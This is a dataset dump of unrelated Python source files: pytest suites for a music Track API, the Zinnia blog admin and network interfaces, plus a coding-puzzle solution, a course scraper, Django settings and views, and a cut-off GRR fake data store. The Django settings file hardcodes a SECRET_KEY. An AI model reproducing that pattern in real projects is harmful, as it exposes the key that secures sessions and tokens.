id
stringlengths 1
7
| text
stringlengths 6
1.03M
| dataset_id
stringclasses 1
value |
---|---|---|
1690712
|
<filename>tests/domain/test_Track_group.py
import pytest
from tloen.domain import Application, Track
@pytest.mark.asyncio
async def test_1():
track_a = Track()
track_b = Track()
group_track = await Track.group([track_a, track_b])
assert isinstance(group_track, Track)
assert list(group_track.tracks) == [track_a, track_b]
assert group_track.application is track_a.application
assert group_track.channel_count is None
assert group_track.name is None
assert group_track.parent is None
assert group_track.provider is track_a.provider
assert not group_track.is_cued
assert not group_track.is_muted
assert not group_track.is_soloed
assert track_a.parent is group_track.tracks
assert track_b.parent is group_track.tracks
@pytest.mark.asyncio
async def test_2():
application = Application()
context = await application.add_context()
track_a = await context.add_track()
track_b = await context.add_track()
track_c = await context.add_track()
group_track = await Track.group([track_b, track_c])
assert list(context.tracks) == [track_a, group_track]
assert list(group_track.tracks) == [track_b, track_c]
assert group_track.application is application
assert group_track.parent is context.tracks
assert group_track.provider is context.provider
assert track_b.provider is context.provider
assert track_c.provider is context.provider
@pytest.mark.asyncio
async def test_3():
application = Application()
context = await application.add_context()
track_a = await context.add_track()
track_b = await context.add_track()
track_c = await context.add_track()
await application.boot()
group_track = await Track.group([track_b, track_c])
assert list(context.tracks) == [track_a, group_track]
assert list(group_track.tracks) == [track_b, track_c]
assert group_track.application is application
assert group_track.parent is context.tracks
assert group_track.provider is context.provider
assert track_b.provider is context.provider
assert track_c.provider is context.provider
|
StarcoderdataPython
|
3216377
|
<reponame>rowanv/django-blog-zinnia
# coding=utf-8
"""Test cases for Zinnia's admin"""
from __future__ import unicode_literals
from django.contrib.admin.sites import AdminSite
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.test import RequestFactory
from django.test import TestCase
from django.utils import timezone
from django.utils.translation import activate
from django.utils.translation import deactivate
from zinnia import settings
from zinnia.admin import entry as entry_admin
from zinnia.admin.category import CategoryAdmin
from zinnia.admin.entry import EntryAdmin
from zinnia.managers import PUBLISHED
from zinnia.models.author import Author
from zinnia.models.category import Category
from zinnia.models.entry import Entry
from zinnia.signals import disconnect_entry_signals
from zinnia.tests.utils import datetime
from zinnia.tests.utils import skip_if_custom_user
from zinnia.url_shortener.backends.default import base36
class BaseAdminTestCase(TestCase):
rich_urls = 'zinnia.tests.implementations.urls.default'
poor_urls = 'zinnia.tests.implementations.urls.poor'
model_class = None
admin_class = None
def setUp(self):
disconnect_entry_signals()
activate('en')
self.site = AdminSite()
self.admin = self.admin_class(
self.model_class, self.site)
def tearDown(self):
"""
Deactivate the translation system.
"""
deactivate()
def check_with_rich_and_poor_urls(self, func, args,
result_rich, result_poor):
with self.settings(ROOT_URLCONF=self.rich_urls):
self.assertEqual(func(*args), result_rich)
with self.settings(ROOT_URLCONF=self.poor_urls):
self.assertEqual(func(*args), result_poor)
class TestMessageBackend(object):
"""Message backend for testing"""
def __init__(self, *ka, **kw):
self.messages = []
def add(self, *ka, **kw):
self.messages.append(ka)
@skip_if_custom_user
class EntryAdminTestCase(BaseAdminTestCase):
"""Test case for Entry Admin"""
model_class = Entry
admin_class = EntryAdmin
def setUp(self):
super(EntryAdminTestCase, self).setUp()
params = {'title': 'My title',
'content': 'My content',
'slug': 'my-title'}
self.entry = Entry.objects.create(**params)
self.request_factory = RequestFactory()
self.request = self.request_factory.get('/')
def test_get_title(self):
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words)')
self.entry.comment_count = 1
self.entry.save()
self.entry = Entry.objects.get(pk=self.entry.pk)
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words) (1 reaction)')
self.entry.pingback_count = 1
self.entry.save()
self.entry = Entry.objects.get(pk=self.entry.pk)
self.assertEqual(self.admin.get_title(self.entry),
'My title (2 words) (2 reactions)')
def test_get_authors(self):
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'', '')
author_1 = Author.objects.create_user(
'author-1', '<EMAIL>')
author_2 = Author.objects.create_user(
'author<2>', '<EMAIL>')
self.entry.authors.add(author_1)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/author-1/" target="blank">author-1</a>',
'author-1')
self.entry.authors.add(author_2)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/author-1/" target="blank">author-1</a>, '
'<a href="/authors/author%3C2%3E/" target="blank">'
'author<2></a>',
'author-1, author<2>')
def test_get_authors_non_ascii(self):
author = Author.objects.create_user(
'тест', '<EMAIL>')
self.entry.authors.add(author)
self.check_with_rich_and_poor_urls(
self.admin.get_authors, (self.entry,),
'<a href="/authors/%D1%82%D0%B5%D1%81%D1%82/" '
'target="blank">тест</a>',
'тест')
def test_get_categories(self):
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'', '')
category_1 = Category.objects.create(title='Category <b>1</b>',
slug='category-1')
category_2 = Category.objects.create(title='Category <b>2</b>',
slug='category-2')
self.entry.categories.add(category_1)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category-1/" target="blank">'
'Category <b>1</b></a>',
'Category <b>1</b>')
self.entry.categories.add(category_2)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category-1/" target="blank">'
'Category <b>1</b></a>, '
'<a href="/categories/category-2/" target="blank">Category '
'<b>2</b></a>',
'Category <b>1</b>, Category <b>2</b>')
def test_get_categories_non_ascii(self):
category = Category.objects.create(title='Category тест',
slug='category')
self.entry.categories.add(category)
self.check_with_rich_and_poor_urls(
self.admin.get_categories, (self.entry,),
'<a href="/categories/category/" target="blank">'
'Category тест</a>',
'Category тест')
def test_get_tags(self):
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'', '')
self.entry.tags = 'zinnia'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/zinnia/" target="blank">zinnia</a>',
'zinnia')
self.entry.tags = 'zinnia, t<e>st'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/t%3Ce%3Est/" target="blank">t<e>st</a>, '
'<a href="/tags/zinnia/" target="blank">zinnia</a>',
'zinnia, t<e>st') # Yes, this is not the same order...
def test_get_tags_non_ascii(self):
self.entry.tags = 'тест'
self.check_with_rich_and_poor_urls(
self.admin.get_tags, (self.entry,),
'<a href="/tags/%D1%82%D0%B5%D1%81%D1%82/" '
'target="blank">тест</a>',
'тест')
def test_get_sites(self):
self.assertEqual(self.admin.get_sites(self.entry), '')
self.entry.sites.add(Site.objects.get_current())
self.check_with_rich_and_poor_urls(
self.admin.get_sites, (self.entry,),
'<a href="http://example.com/" target="blank">example.com</a>',
'<a href="http://example.com" target="blank">example.com</a>')
def test_get_short_url(self):
with self.settings(ROOT_URLCONF=self.poor_urls):
entry_url = self.entry.get_absolute_url()
self.check_with_rich_and_poor_urls(
self.admin.get_short_url, (self.entry,),
'<a href="http://example.com/%(hash)s/" target="blank">'
'http://example.com/%(hash)s/</a>' % {
'hash': base36(self.entry.pk)},
'<a href="%(url)s" target="blank">%(url)s</a>' % {
'url': entry_url})
def test_get_is_visible(self):
self.assertEqual(self.admin.get_is_visible(self.entry),
self.entry.is_visible)
def test_queryset(self):
user = Author.objects.create_user(
'user', '<EMAIL>')
self.entry.authors.add(user)
root = Author.objects.create_superuser(
'root', '<EMAIL>', 'toor')
params = {'title': 'My root title',
'content': 'My root content',
'slug': 'my-root-titile'}
root_entry = Entry.objects.create(**params)
root_entry.authors.add(root)
self.request.user = User.objects.get(pk=user.pk)
self.assertEqual(len(self.admin.get_queryset(self.request)), 1)
self.request.user = User.objects.get(pk=root.pk)
self.assertEqual(len(self.admin.get_queryset(self.request)), 2)
def test_get_changeform_initial_data(self):
user = User.objects.create_user(
'user', '<EMAIL>')
site = Site.objects.get_current()
self.request.user = user
data = self.admin.get_changeform_initial_data(self.request)
self.assertEqual(data, {'authors': [user.pk],
'sites': [site.pk]})
request = self.request_factory.get('/?title=data')
request.user = user
data = self.admin.get_changeform_initial_data(request)
self.assertEqual(data, {'title': 'data'})
def test_formfield_for_manytomany(self):
staff = User.objects.create_user(
'staff', '<EMAIL>')
author = User.objects.create_user(
'author', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = root
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 1)
staff.is_staff = True
staff.save()
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 2)
self.entry.authors.add(Author.objects.get(pk=author.pk))
field = self.admin.formfield_for_manytomany(
Entry.authors.field, self.request)
self.assertEqual(field.queryset.count(), 3)
def test_get_readonly_fields(self):
user = User.objects.create_user(
'user', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = user
self.assertEqual(self.admin.get_readonly_fields(self.request),
['status', 'authors'])
self.request.user = root
self.assertEqual(self.admin.get_readonly_fields(self.request),
[])
def test_get_actions(self):
original_ping_directories = settings.PING_DIRECTORIES
user = User.objects.create_user(
'user', '<EMAIL>')
root = User.objects.create_superuser(
'root', '<EMAIL>', 'toor')
self.request.user = user
settings.PING_DIRECTORIES = True
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'ping_directories',
'put_on_top',
'mark_featured',
'unmark_featured'])
settings.PING_DIRECTORIES = False
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'put_on_top',
'mark_featured',
'unmark_featured'])
self.request.user = root
self.assertEqual(
list(self.admin.get_actions(self.request).keys()),
['delete_selected',
'make_mine',
'make_published',
'make_hidden',
'close_comments',
'close_pingbacks',
'close_trackbacks',
'put_on_top',
'mark_featured',
'unmark_featured'])
settings.PING_DIRECTORIES = original_ping_directories
def test_get_actions_in_popup_mode_issue_291(self):
user = User.objects.create_user(
'user', '<EMAIL>')
request = self.request_factory.get('/?_popup=1')
request.user = user
self.assertEqual(
list(self.admin.get_actions(request).keys()),
[])
def test_make_mine(self):
user = Author.objects.create_user(
'user', '<EMAIL>')
self.request.user = User.objects.get(pk=user.pk)
self.request._messages = TestMessageBackend()
self.assertEqual(user.entries.count(), 0)
self.admin.make_mine(self.request, Entry.objects.all())
self.assertEqual(user.entries.count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
def test_make_published(self):
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = []
self.request._messages = TestMessageBackend()
self.entry.sites.add(Site.objects.get_current())
self.assertEqual(Entry.published.count(), 0)
self.admin.make_published(self.request, Entry.objects.all())
self.assertEqual(Entry.published.count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
settings.PING_DIRECTORIES = original_ping_directories
def test_make_hidden(self):
self.request._messages = TestMessageBackend()
self.entry.status = PUBLISHED
self.entry.save()
self.entry.sites.add(Site.objects.get_current())
self.assertEqual(Entry.published.count(), 1)
self.admin.make_hidden(self.request, Entry.objects.all())
self.assertEqual(Entry.published.count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_comments(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
comment_enabled=True).count(), 1)
self.admin.close_comments(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
comment_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_pingbacks(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
pingback_enabled=True).count(), 1)
self.admin.close_pingbacks(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
pingback_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_close_trackbacks(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
trackback_enabled=True).count(), 1)
self.admin.close_trackbacks(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(
trackback_enabled=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 1)
def test_put_on_top(self):
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = []
self.request._messages = TestMessageBackend()
self.entry.publication_date = datetime(2011, 1, 1, 12, 0)
self.admin.put_on_top(self.request, Entry.objects.all())
self.assertEqual(
Entry.objects.get(pk=self.entry.pk).creation_date.date(),
timezone.now().date())
self.assertEqual(len(self.request._messages.messages), 1)
settings.PING_DIRECTORIES = original_ping_directories
def test_mark_unmark_featured(self):
self.request._messages = TestMessageBackend()
self.assertEqual(Entry.objects.filter(
featured=True).count(), 0)
self.admin.mark_featured(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(featured=True).count(), 1)
self.assertEqual(len(self.request._messages.messages), 1)
self.admin.unmark_featured(self.request, Entry.objects.all())
self.assertEqual(Entry.objects.filter(featured=True).count(), 0)
self.assertEqual(len(self.request._messages.messages), 2)
def test_ping_directories(self):
class FakePinger(object):
def __init__(self, *ka, **kw):
self.results = [{'flerror': False, 'message': 'OK'},
{'flerror': True, 'message': 'KO'}]
def join(self):
pass
original_pinger = entry_admin.DirectoryPinger
entry_admin.DirectoryPinger = FakePinger
original_ping_directories = settings.PING_DIRECTORIES
settings.PING_DIRECTORIES = ['http://ping.com/ping']
self.request._messages = TestMessageBackend()
self.admin.ping_directories(self.request, Entry.objects.all(), False)
self.assertEqual(len(self.request._messages.messages), 0)
self.admin.ping_directories(self.request, Entry.objects.all())
self.assertEqual(len(self.request._messages.messages), 2)
self.assertEqual(self.request._messages.messages,
[(20, 'http://ping.com/ping : KO', ''),
(20, 'http://ping.com/ping directory succesfully '
'pinged 1 entries.', '')])
entry_admin.DirectoryPinger = original_pinger
settings.PING_DIRECTORIES = original_ping_directories
class CategoryAdminTestCase(BaseAdminTestCase):
"""Test cases for Category Admin"""
model_class = Category
admin_class = CategoryAdmin
def test_get_tree_path(self):
category = Category.objects.create(title='Category', slug='cat')
self.check_with_rich_and_poor_urls(
self.admin.get_tree_path, (category,),
'<a href="/categories/cat/" target="blank">/cat/</a>',
'/cat/')
|
StarcoderdataPython
|
4840930
|
<gh_stars>1-10
'''
Given an array of integers nums and an integer k, return the total number of continuous subarrays whose sum equals to k.
Example 1:
Input: nums = [1,1,1], k = 2
Output: 2
Example 2:
Input: nums = [1,2,3], k = 3
Output: 2
Constraints:
1 <= nums.length <= 2 * 10^4
-1000 <= nums[i] <= 1000
-10^7 <= k <= 10^7
'''
class Solution:
def subarraySum(self, nums: List[int], k: int) -> int:
sumCount = {}
count = 0
sumValue = 0
for i in nums:
sumValue = sumValue+i
if sumValue == k:
count = count + 1
if (sumValue - k) in sumCount.keys():
count = count + sumCount[sumValue-k]
if sumValue in sumCount.keys():
sumCount[sumValue] = sumCount[sumValue] + 1
else:
sumCount[sumValue] = 1
return count
|
StarcoderdataPython
|
21207
|
import json
from PIL import Image
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.7.json') as f:
val_1_7 = json.load(f)
with open('sl4_side_val_1.7/results.json') as f:
new_1_8 = json.load(f)
ROOT = '/home/tianpei.qian/workspace/data_local/sl4_front_1.0/'
for old, new in zip(val_1_7, new_1_8):
assert old['file'] == new['file']
im = Image.open(ROOT + old['file'])
im_width, im_height = im.size
for box in new['detections']:
new_box = {}
x_min, x_max, y_min, y_max = box['x_min'], box['x_max'], box['y_min'], box['y_max']
width, height = x_max - x_min, y_max - y_min
new_box['coord'] = [(x_min + x_max) / 2 / im_width, (y_min + y_max) / 2 / im_height, width / im_width, height / im_height]
new_box['meta'] = {'isfrontcar': False}
new_box['class'] = box['kind']
new_box['occluded'] = 'none'
new_box['score'] = box['score']
old['boxes'].append(new_box)
with open('/home/tianpei.qian/workspace/data_local/sl4_front_1.0/sl4_side_val_1.8.json', 'w') as f:
json.dump(val_1_7, f)
|
StarcoderdataPython
|
3323920
|
<gh_stars>1-10
import requests
import csv
from time import time
baseURL = "https://sisu-api.apps.mec.gov.br/api/v1/oferta/"
filename = "all_courses"
t0 = time()
print("Will write to file '{}.csv'.".format(filename))
csvFile = open(filename + ".csv", "w+", encoding="UTF-8")
csvFileWriter = csv.writer(csvFile, delimiter=";", quotechar="\"", quoting=csv.QUOTE_ALL, lineterminator="\n")
response = requests.get(baseURL+"instituicoes").json()
instituicoes = [r["co_ies"] for r in response]
ofertas = []
for i, instituicao in enumerate(instituicoes):
print("[{:>3}/{}] Scanning ID #{}...".format(i+1, len(instituicoes), instituicao))
response = requests.get(baseURL+"instituicao/"+instituicao).json()
for i in range(len(response)-1):
r = response[str(i)]
codigo = r["co_oferta"]
cursoNome = r["no_curso"]
cursoGrau = r["no_grau"]
cursoTurno = r["no_turno"]
vagasTotais = r["qt_vagas_sem1"]
campusNome = r["no_campus"]
campusCidade = r["no_municipio_campus"]
campusUF = r["sg_uf_campus"]
iesNome = r["no_ies"]
iesSG = r["sg_ies"]
oferta = (campusUF, iesNome, iesSG, campusCidade, campusNome, cursoNome, cursoGrau, cursoTurno, vagasTotais, codigo)
ofertas.append(oferta)
ofertas = sorted(ofertas)
# Write to .csv
for oferta in ofertas:
csvFileWriter.writerow(tuple(oferta))
print("Written {} courses to '{}.csv' in {:.1f}s.".format(len(ofertas), filename, time()-t0))
|
StarcoderdataPython
|
1615469
|
import os
PROJECT_PATH = os.path.abspath(os.getcwd())
DEBUG = False
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('<NAME>', '<EMAIL>'),
('<NAME>', '<EMAIL>'),
)
MANAGERS = ADMINS
ALLOWED_HOSTS = [
'127.0.0.1',
]
TIME_ZONE = 'Europe/Istanbul'
LANGUAGE_CODE = 'TR-tr'
SITE_ID = 1
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_ROOT = ''
MEDIA_URL = ''
STATIC_ROOT = '{:s}/static/'.format(PROJECT_PATH)
STATIC_URL = '/static/'
STATICFILES_DIRS = (
'{:s}/static_files/'.format(PROJECT_PATH),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
SECRET_KEY = '#1f*6@=e@*7t1yk_!gef=jn!pc5#mv_%)=8__y8*gi0&0t7=u('
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# 'djangospam.cookie.middleware.SpamCookieMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
)
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(PROJECT_PATH, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'pyist.urls'
WSGI_APPLICATION = 'pyist.wsgi.application'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.sitemaps',
'django_gravatar',
'markitup',
'nose',
'people',
'presentations',
'blog',
)
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Database Settings
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': '{:s}/data/db.sqlite'.format(PROJECT_PATH),
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
# Markitup Settings
MARKITUP_SET = 'markitup/sets/markdown'
MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': False})
# Blog Settings
BLOG = {
'TITLE': 'Python İstanbul',
'DESCRIPTION': 'Python İstanbul Günlüğü',
'LIMIT': 5,
'URL': 'http://pyistanbul.org/',
'DISQUS_USERNAME': 'pyistanbul',
'USE_DISQUS': False,
}
# Djangospam Settings
# DJANGOSPAM_COOKIE_KEY = 'argumentclinic'
# DJANGOSPAM_LOG = 'spam.log'
# Nose Settings
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
|
StarcoderdataPython
|
3379840
|
import math
def older(person):
print()
print('Person ', person, ' is older')
def main():
# compiling the bday for person 1
print('please input birthday of 1st person')
p1_year = int(input('\tyear: ')) * math.pow(10, 4)
p1_month = 0
while p1_month > 12 or p1_month == 0:
p1_month = int(input('\tmonth: '))
p1_month *= math.pow(10,2)
p1_day = 0
while p1_day > 31 or p1_day ==0:
p1_day = int(input('\tday: '))
# compiling the bday for person 2
print('please input birthday of 2nd person')
p2_year = int(input('\tyear: ')) * math.pow(10,4)
p2_month = 0
while p2_month > 12 or p2_month == 0:
p2_month = int(input('\tmonth: '))
p2_month *= math.pow(10,2)
p2_day = 0
while p2_day > 31 or p2_day == 0:
p2_day = int(input('\tday: '))
# summing up each's birthday
p1_bday = p1_year + p1_month + p1_day
p2_bday = p2_year + p2_month + p2_day
if (p1_bday == p2_bday):
print('they have the same birthday')
elif (p1_bday < p2_bday):
older(1)
else:
older(2)
print()
while 1:
main()
|
StarcoderdataPython
|
6814
|
<reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
test_case_file = 'if_subif.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_description',
'page_object_class': Interfaces}])
def test_if_subif_description(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_enabled',
'page_object_class': Interfaces}])
def test_if_subif_enabled(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_prefix_length',
'page_object_class': Interfaces}])
def test_if_subif_ip_prefix_length(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_state',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_ip_state(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_origin',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_origin(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
|
StarcoderdataPython
|
3392633
|
<filename>pettygram/views.py
#django
from django.http import HttpResponse
#utilities
from datetime import datetime
import json
def hello_world(request):
return HttpResponse("oh, hi! , Current server time is {now}".format(
now= datetime.now().strftime('%b %dth, %y - %H:%M hrs')
))
def sorted_integers(request):
#return a json response with sorted integers
numbers = [int (i) for i in request.GET['numbers'].split(',')]
sorted_ints = sorted(numbers)
#data que será mostrada
data = {
'status' : 'ok',
'numbers': sorted_ints,
'message': 'Integer sorted succesfully'
}
return HttpResponse(
json.dumps(data),
content_type='application/json'
)
def say_hi(request, name, age):
""""Return a greeting"""
if age < 12:
message = 'Sorry {}, you not allowed here'.format(name)
else:
message = 'Hello, welcome to pettygram'.format(name)
return HttpResponse(message)
|
StarcoderdataPython
|
120688
|
# Testing serial ports
# https://faradayrf.com/unit-testing-pyserial-code/
# Import modules
import serial
class SerialTestClass(object):
"""A mock serial port test class"""
def __init__(self):
"""Creates a mock serial port which is a loopback object"""
self.device = "test"
self._port = "loop://"
self._timeout = 0
self._baudrate = 115200
self.serialPort = \
serial.serial_for_url(url=self._port,
timeout=self._timeout,
baudrate=self._baudrate)
def __enter__(self, *args, **kwargs):
pass
def __exit__(self, *args, **kwargs):
pass
def open(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def read(self, command):
pass
def write(self, command):
pass
|
StarcoderdataPython
|
3343552
|
#!/usr/bin/env python
"""An implementation of an in-memory data store for testing."""
from __future__ import print_function
import sys
import threading
import time
from future.utils import iteritems
from grr_response_core.lib import rdfvalue
from grr_response_core.lib import utils
from grr_response_server import aff4
from grr_response_server import data_store
class FakeDBSubjectLock(data_store.DBSubjectLock):
"""A fake transaction object for testing."""
def _Acquire(self, lease_time):
self.expires = int((time.time() + lease_time) * 1e6)
with self.store.lock:
expires = self.store.transactions.get(self.subject)
if expires and (time.time() * 1e6) < expires:
raise data_store.DBSubjectLockError("Subject is locked")
self.store.transactions[self.subject] = self.expires
self.locked = True
def UpdateLease(self, duration):
self.expires = int((time.time() + duration) * 1e6)
self.store.transactions[self.subject] = self.expires
def Release(self):
with self.store.lock:
if self.locked:
self.store.transactions.pop(self.subject, None)
self.locked = False
class FakeDataStore(data_store.DataStore):
"""A fake data store - Everything is in memory."""
def __init__(self):
super(FakeDataStore, self).__init__()
self.subjects = {}
# All access to the store must hold this lock.
self.lock = threading.RLock()
# The set of all transactions in flight.
self.transactions = {}
self._value_converter = aff4.ValueConverter()
@utils.Synchronized
def DeleteSubject(self, subject, sync=False):
_ = sync
subject = utils.SmartUnicode(subject)
try:
del self.subjects[subject]
except KeyError:
pass
@utils.Synchronized
def ClearTestDB(self):
self.subjects = {}
def DBSubjectLock(self, subject, lease_time=None):
return FakeDBSubjectLock(self, subject, lease_time=lease_time)
@utils.Synchronized
def Set(self,
subject,
attribute,
value,
timestamp=None,
replace=True,
sync=True):
"""Set the value into the data store."""
subject = utils.SmartUnicode(subject)
_ = sync
attribute = utils.SmartUnicode(attribute)
if timestamp is None or timestamp == self.NEWEST_TIMESTAMP:
timestamp = time.time() * 1000000
if subject not in self.subjects:
self.subjects[subject] = {}
if replace or attribute not in self.subjects[subject]:
self.subjects[subject][attribute] = []
encoded_value = self._value_converter.Encode(attribute, value)
self.subjects[subject][attribute].append([encoded_value, int(timestamp)])
self.subjects[subject][attribute].sort(key=lambda x: x[1])
@utils.Synchronized
def MultiSet(self,
subject,
values,
timestamp=None,
replace=True,
sync=True,
to_delete=None):
subject = utils.SmartUnicode(subject)
if to_delete:
self.DeleteAttributes(subject, to_delete, sync=sync)
for k, seq in iteritems(values):
for v in seq:
if isinstance(v, (list, tuple)):
v, element_timestamp = v
else:
element_timestamp = timestamp
self.Set(
subject,
k,
v,
timestamp=element_timestamp,
replace=replace,
sync=sync)
@utils.Synchronized
def DeleteAttributes(self,
subject,
attributes,
start=None,
end=None,
sync=None):
_ = sync # Unimplemented.
if isinstance(attributes, basestring):
raise ValueError(
"String passed to DeleteAttributes (non string iterable expected).")
subject = utils.SmartUnicode(subject)
try:
record = self.subjects[subject]
keys_to_delete = []
for name, values in iteritems(record):
if name not in attributes:
continue
start = start or 0
if end is None:
end = (2**63) - 1 # sys.maxsize
new_values = []
for value, timestamp in values:
if not start <= timestamp <= end:
new_values.append((value, int(timestamp)))
if new_values:
record[name] = new_values
else:
keys_to_delete.append(name)
